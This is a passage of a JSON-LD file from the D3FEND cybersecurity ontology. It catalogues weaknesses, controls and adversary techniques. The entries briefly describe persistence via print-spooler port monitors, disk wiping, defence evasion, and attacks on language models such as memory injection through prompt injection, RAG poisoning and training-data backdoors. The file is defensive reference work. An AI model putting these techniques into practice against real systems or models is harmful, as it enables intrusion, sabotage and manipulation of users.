      "rdfs:label": "Uncontrolled Search Path Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CCI-002238_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically locks the account or node for either an organization-defined time period, until the locked account or node is released by an administrator, or delays the next logon prompt according to the organization-defined delay algorithm when the maximum number of unsuccessful logon attempts is exceeded.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002238"
    },
    {
      "@id": "d3f:FileSystemLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file system link associates a name with a file on a file system.  Most generally, this may be a direct reference (a hard link) or an indirect one (a soft link).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:label": "File System Link",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:TA0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what's around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.",
      "d3f:display-order": 7,
      "rdfs:label": "Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1411",
      "@type": "owl:Class",
      "d3f:attack-id": "T1411",
      "d3f:definition": "The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1417.002",
      "rdfs:label": "Input Prompt - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1417.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Input Prompt"
    },
    {
      "@id": "d3f:T1013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1013",
      "d3f:definition": "A port monitor can be set through the  (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in <code>C:\\Windows\\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.010",
      "rdfs:label": "Port Monitors",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:OTProprietaryMessage",
      "@type": "owl:Class",
      "d3f:definition": "Vendor specific and may not be publicly documented, or values left for device specific configuration.",
      "rdfs:label": "OT Proprietary Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateThreadEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateThreadEx",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:OTDiagnosticsMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Relay error, exception, alarm, or log information.",
      "rdfs:label": "OT Diagnostics Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N00b0b9a6a9454bd18b466089173463e1"
        }
      ]
    },
    {
      "@id": "_:N00b0b9a6a9454bd18b466089173463e1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:CWE-528",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-528",
      "d3f:definition": "The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.",
      "rdfs:label": "Exposure of Core Dump File to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:Semi-SupervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSL",
      "d3f:definition": "Semi-supervised learning is a branch of machine learning that combines a small amount of labeled data with a large amount of unlabeled data during training.",
      "d3f:kb-article": "## References\nSemi-Supervised Learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Semi-Supervised_Learning).",
      "rdfs:label": "Semi-Supervised Learning",
      "rdfs:seeAlso": {
        "@id": "https://link.springer.com/article/10.1007/s10994-019-05855-6"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Multi-factor Authentication to Privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "IA-2(1)"
    },
    {
      "@id": "d3f:AML.T0080.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0080.000",
      "d3f:definition": "Adversaries may manipulate the memory of a large language model (LLM) in order to persist changes to the LLM to future chat sessions.\n\nMemory is a common feature in LLMs that allows them to remember information across chat sessions by utilizing a user-specific database. Because the memory is controlled via normal conversations with the user (e.g. \"remember my preference for ...\") an adversary can inject memories via Direct or Indirect Prompt Injection. Memories may contain malicious instructions (e.g. instructions that leak private conversations) or may promote the adversary's hidden agenda (e.g. manipulating the user).",
      "rdfs:label": "Memory - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0080.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0080"
      },
      "skos:prefLabel": "Memory"
    },
    {
      "@id": "d3f:ATTACKICSInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0108"
      },
      "rdfs:label": "Initial Access Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nc45559544b704ed7a1ce0c91b521aeb8"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:Nc45559544b704ed7a1ce0c91b521aeb8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0108"
      }
    },
    {
      "@id": "d3f:LinuxOpenAtArgumentO_RDONLY-O_WRONLY-O_RDWR",
      "@type": "owl:Class",
      "d3f:definition": "Same functionality as Linux Open but slight differences in parameter.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat.2.html"
      },
      "rdfs:label": "Linux OpenAt Argument O_RDONLY, O_WRONLY, O_RDWR",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-007%3ADetectingTamperingOfWindowsDefenderCommandPrompt_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-007/"
      },
      "d3f:kb-abstract": "In an attempt to avoid detection after compromising a machine, threat actors often try to disable Windows Defender. This is often done using “sc” [service control], a legitimate tool provided by Microsoft for managing services. This action interferes with event detection and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "d",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt",
      "rdfs:label": "Reference - CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt - MITRE"
    },
    {
      "@id": "d3f:OTDeviceFirmwareCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Interact with the software responsible for low-level control of the system.",
      "rdfs:label": "OT Device Firmware Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:N9fdb1e11559e4541b092c5e21b885d05"
        }
      ]
    },
    {
      "@id": "_:N9fdb1e11559e4541b092c5e21b885d05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceFirmwareCommand"
      }
    },
    {
      "@id": "d3f:Reference-WhatIsNX_XDFeature_RedHat",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://access.redhat.com/solutions/2936741"
      },
      "d3f:kb-abstract": "What is NX/XD feature ?\nHow to check whether NX/XD is enabled ?\nHow to enable or disable NX/XD?\n\nNX/XD is a hardware cpu feature which is provided in almost all the hardware. Some BIOS has advanced option of enabling or disabling it.\nNX stands for No eXecute and XD stands for eXecute Disable. Both are same and is a technology used in processors to prevent execution of certain types of code.",
      "d3f:kb-author": "Red Hat",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Red Hat",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSegmentExecutionPrevention"
      },
      "d3f:kb-reference-title": "What is NX/XD feature?",
      "rdfs:label": "Reference - What is NX/XD feature?"
    },
    {
      "@id": "d3f:T1556.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1556.009",
      "d3f:definition": "Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "Conditional Access Policies",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1556"
        },
        {
          "@id": "_:N0f0802767e1b4cd7809d7cd81c629b59"
        }
      ]
    },
    {
      "@id": "_:N0f0802767e1b4cd7809d7cd81c629b59",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:regenerates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x regenerates y: The entity x discards the current digital artifact y and creates a new version that serves the same function.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00167632-v"
      },
      "rdfs:label": "regenerates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:AccessControlAdministrationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event concerning the administrative actions of setting, modifying, or abolishing permissions, configuring access control settings, and managing user access rights to ensure alignment with access control policies.",
      "rdfs:label": "Access Control Administration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlEvent"
      },
      "skos:altLabel": [
        "Permission Administration Event",
        "Permission Provisioning Event"
      ]
    },
    {
      "@id": "d3f:Reference-TrustedCommunicationsWithChildProcesses_MicrosoftTechnologyLicensingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120174210A1"
      },
      "d3f:kb-abstract": "A method to identify a child process to a parent process in an operating system includes obtaining a token and login identifier from the operating system. The parent process creates a remote procedure call communications endpoint to communicate with the child process. Thereafter, a child process is spawned by the parent process. A child-initiated request to communicate with the parent process is then received by the parent process. In order to verify the identity of the child-initiated request, the parent process impersonates the child process and receives as identifier that identifies the requestor child process. The requestor process identifier and the spawned child identifier are compared. Based on the comparison, the parent process responds to the child-initiated request. In another embodiment, process identifiers are used by the parent process to verify the identity of a child process the requests communication with the parent process.",
      "d3f:kb-author": "Kedarnath Atmaram Dubhashi, Jonathan D. Schwartz, Sambavi Muthukrishnan, Simon Skaria",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting malicious processes that claim to be the child process of a legitimate parent process. During the spawning of a child process, a child process identifier is generated. The child process identifier is a unique identifier that can be used to identify a child process. The child process identifier is transmitted by the security system of the operating system to the parent process. The parent process keeps track of the child process identifier. When a new child-initiated communications request is received by the parent process, the parent process checks if the requesting child process identifier and the child process identifier that the parent process is tracking are the same. If the identifiers are not the same, the parent process refuses the request.",
      "d3f:kb-organization": "Microsoft Technology Licensing LLC",
      "d3f:kb-reference-title": "Trusted Communications With Child Processes",
      "rdfs:label": "Reference - Trusted Communications With Child Processes - Microsoft Technology Licensing LLC"
    },
    {
      "@id": "d3f:CWE-556",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-556",
      "d3f:definition": "Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges.",
      "rdfs:label": "ASP.NET Misconfiguration: Use of Identity Impersonation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:may-run",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-run y: The entity x may run the thing y; that is, 'x runs y' may be true.",
      "rdfs:label": "may-run",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:OSAPIReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that reads data from a file or input stream into memory.",
      "d3f:invokes": {
        "@id": "d3f:ReadFile"
      },
      "rdfs:label": "OS API Read File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Ne8eae04319074e2e87dc048d5d486c51"
        }
      ]
    },
    {
      "@id": "_:Ne8eae04319074e2e87dc048d5d486c51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ReadFile"
      }
    },
    {
      "@id": "d3f:OperationalLogicValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalLogicValidation"
      ],
      "d3f:d3fend-id": "D3-OLV",
      "d3f:definition": "Validation of variable state in the context of the control logic of the operational application.",
      "d3f:kb-article": "## How it works\nValidates the type, value, and/or range of a variable taking into account the local operational logic and operational state.\n\nFor example, if a controller has a restricted range when in a specified state, this may crosscheck the value against the state in addition to a more general range validation. ",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:validates": {
        "@id": "d3f:OTControlFunction"
      },
      "rdfs:label": "Operational Logic Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DomainLogicValidation"
        },
        {
          "@id": "_:N6d8e295299a74bb597a13051b21b8584"
        }
      ]
    },
    {
      "@id": "_:N6d8e295299a74bb597a13051b21b8584",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlFunction"
      }
    },
    {
      "@id": "d3f:T1561.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1561.001",
      "d3f:definition": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Partition"
        },
        {
          "@id": "d3f:PartitionTable"
        },
        {
          "@id": "d3f:Volume"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:BlockDevice"
      },
      "rdfs:label": "Disk Content Wipe",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1561"
        },
        {
          "@id": "_:Nf8b84bc1e1dd4614b6e824b685f2952f"
        },
        {
          "@id": "_:N502c117024aa4619bc2c99fc6b0f2e91"
        },
        {
          "@id": "_:Ndc6a75cb540541829dc66c877e9f64e7"
        },
        {
          "@id": "_:N9afc66a3676043eb81f9013874a09577"
        },
        {
          "@id": "_:Nfa3b592cee76465d9797681dd30f9c4d"
        }
      ]
    },
    {
      "@id": "_:Nf8b84bc1e1dd4614b6e824b685f2952f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:N502c117024aa4619bc2c99fc6b0f2e91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Partition"
      }
    },
    {
      "@id": "_:Ndc6a75cb540541829dc66c877e9f64e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "_:N9afc66a3676043eb81f9013874a09577",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Volume"
      }
    },
    {
      "@id": "_:Nfa3b592cee76465d9797681dd30f9c4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BlockDevice"
      }
    },
    {
      "@id": "d3f:inventoried-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x inventoried-by y: The entity x is cataloged, recorded, or tracked by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:inventories"
      },
      "rdfs:label": "inventoried-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CloudServiceAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A request-response comprising a user credential presentation to a system and a verification response where the verifying party is a cloud service.",
      "rdfs:label": "Cloud Service Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:WebAuthentication"
      }
    },
    {
      "@id": "d3f:CWE-176",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-176",
      "d3f:definition": "The product does not properly handle when an input contains Unicode encoding.",
      "rdfs:label": "Improper Handling of Unicode Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:FileHashReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileHashReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileHash"
      },
      "d3f:d3fend-id": "D3-FHRA",
      "d3f:definition": "Analyzing the reputation of a file hash.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Reputation_of_an_entity_associated_with_a_content_item"
      },
      "rdfs:label": "File Hash Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:N9eb3c3981e1f416eb81a85c221c33ac1"
        }
      ]
    },
    {
      "@id": "_:N9eb3c3981e1f416eb81a85c221c33ac1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileHash"
      }
    },
    {
      "@id": "d3f:IdentifierReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IdentifierReputationAnalysis"
      ],
      "d3f:d3fend-id": "D3-IRA",
      "d3f:definition": "Analyzing the reputation of an identifier.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Finding_phishing_sites"
      },
      "rdfs:label": "Identifier Reputation Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:IdentifierAnalysis"
      }
    },
    {
      "@id": "d3f:OutboundInternetEncryptedWebTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet encrypted web traffic is network traffic using a standard web protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Encrypted Web Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OutboundInternetEncryptedTraffic"
        },
        {
          "@id": "d3f:OutboundInternetWebTraffic"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0005.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005.000",
      "d3f:definition": "Proxy models may be trained from AI artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary.\nThis can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.",
      "rdfs:label": "Train Proxy via Gathered AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0005"
      },
      "skos:prefLabel": "Train Proxy via Gathered AI Artifacts"
    },
    {
      "@id": "d3f:CWE-1284",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1284",
      "d3f:definition": "The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties.",
      "rdfs:label": "Improper Validation of Specified Quantity in Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:StackFrame",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A machine-dependent and application-binary-dependent (ABI-dependent) data structure containing subroutine state information including the arguments passed into the routine, the return address back to the routine's caller, and space for local variables of the routine.",
      "d3f:may-contain": [
        {
          "@id": "d3f:Pointer"
        },
        {
          "@id": "d3f:StackFrameCanary"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Call_stack#Structure"
      },
      "rdfs:label": "Stack Frame",
      "rdfs:seeAlso": {
        "@id": "dbr:Call_stack"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:StackComponent"
        },
        {
          "@id": "_:N32e5848d34ba433997b9e4a08dbffb69"
        },
        {
          "@id": "_:Nd0085b9c745b4737ae1cd3be9d94f569"
        }
      ],
      "skos:altLabel": [
        "Activation Frame",
        "Activation Record"
      ]
    },
    {
      "@id": "_:N32e5848d34ba433997b9e4a08dbffb69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "_:Nd0085b9c745b4737ae1cd3be9d94f569",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrameCanary"
      }
    },
    {
      "@id": "d3f:AML.T0020",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0020",
      "d3f:definition": "Adversaries may attempt to poison datasets used by an AI model by modifying the underlying data or its labels.\nThis allows the adversary to embed vulnerabilities in AI models trained on the data that may not be easily detectable.\nData poisoning attacks may or may not require modifying the labels.\nThe embedded vulnerability is activated at a later time by data samples with an [Insert Backdoor Trigger](/techniques/AML.T0043.004)\n\nPoisoned data can be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](/tactics/AML.TA0004) to the system.",
      "rdfs:label": "Poison Training Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0020"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASPersistenceTechnique"
        },
        {
          "@id": "d3f:ATLASResourceDevelopmentTechnique"
        }
      ],
      "skos:prefLabel": "Poison Training Data"
    },
    {
      "@id": "d3f:AML.T0070",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0070",
      "d3f:definition": "Adversaries may inject malicious content into data indexed by a retrieval augmented generation (RAG) system to contaminate a future thread through RAG-based search results. This may be accomplished by placing manipulated documents in a location the RAG indexes (see [Gather RAG-Indexed Targets](/techniques/AML.T0064)).\n\nThe content may be targeted such that it would always surface as a search result for a specific user query. The adversary's content may include false or misleading information. It may also include prompt injections with malicious instructions, or false RAG entries.",
      "rdfs:label": "RAG Poisoning - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0070"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "RAG Poisoning"
    },
    {
      "@id": "d3f:DefensiveTactic",
      "@type": "owl:Class",
      "d3f:definition": "A plan for attaining a particular goal.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05913746-n"
      },
      "rdfs:label": "Defensive Tactic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Goal"
        },
        {
          "@id": "_:N1664f80664284c9d988655988c9f89dd"
        }
      ]
    },
    {
      "@id": "_:N1664f80664284c9d988655988c9f89dd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enabled-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "d3f:T0889",
      "@type": "owl:Class",
      "d3f:attack-id": "T0889",
      "d3f:definition": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.",
      "rdfs:label": "Modify Program - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSPersistenceTechnique"
      },
      "skos:prefLabel": "Modify Program"
    },
    {
      "@id": "d3f:has-goal",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-goal",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-use-case-object-property"
      }
    },
    {
      "@id": "d3f:T1006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Volume"
      },
      "d3f:attack-id": "T1006",
      "d3f:definition": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)",
      "rdfs:label": "Direct Volume Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N6d39a1fb6f4f462d991c0d83378e32d2"
        }
      ]
    },
    {
      "@id": "_:N6d39a1fb6f4f462d991c0d83378e32d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Volume"
      }
    },
    {
      "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0029"
      },
      "rdfs:label": "Privilege Escalation Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:Na46d35f943544e8cb27056e558b0d451"
        }
      ],
      "skos:prefLabel": "Privilege Escalation Technique"
    },
    {
      "@id": "_:Na46d35f943544e8cb27056e558b0d451",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0029"
      }
    },
    {
      "@id": "d3f:CCI-002689_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system collects indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002689"
    },
    {
      "@id": "d3f:Non-ParametricTests",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NPT",
      "d3f:definition": "A non-parametric test relies is used when the underlying distribution of data is non-symmetric (non-normal distribution).",
